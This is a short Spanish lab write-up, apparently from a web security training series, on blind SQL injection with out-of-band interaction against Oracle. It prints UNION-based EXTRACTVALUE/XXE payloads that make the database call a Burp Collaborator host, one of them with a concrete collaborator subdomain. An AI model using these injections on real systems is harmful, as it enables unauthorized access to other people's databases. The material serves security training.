👑Laboratorio: Inyección SQL ciega con interacción fuera de banda
Usando tecnicas fuera de banda.
El comando inyeccion SQL que usaremos para aplicar la interaccion fuera de banda con el subdominio que proporcionamos con burp (lamentablemente es de pago), pero podremos mandar el comando para poder pasar esta primer parte de laboratorio.
Comando: SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
'+UNION+SELECT+EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "<http://BURP-COLLABORATOR-SUBDOMAIN/>"> %remote;]>'),'/l') FROM dual--
'+UNION+SELECT+EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "https:0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net"> %remote;]>'),'/l') FROM dual--
#el segundo es con un nombre de dominio X de ejemplo, pero no sirve.
En donde dice burp Collaborator se debe reemplazar por el servidor integrado de burp pro, este lab se resuelve con burp de pago.

PreviousLaboratorio: Inyección SQL ciega con retardos de tiempo y recuperación de informaciónNextLaboratorio: ataque de inyección SQL, consulta del tipo y versión de la base de datos en Oracle
Last updated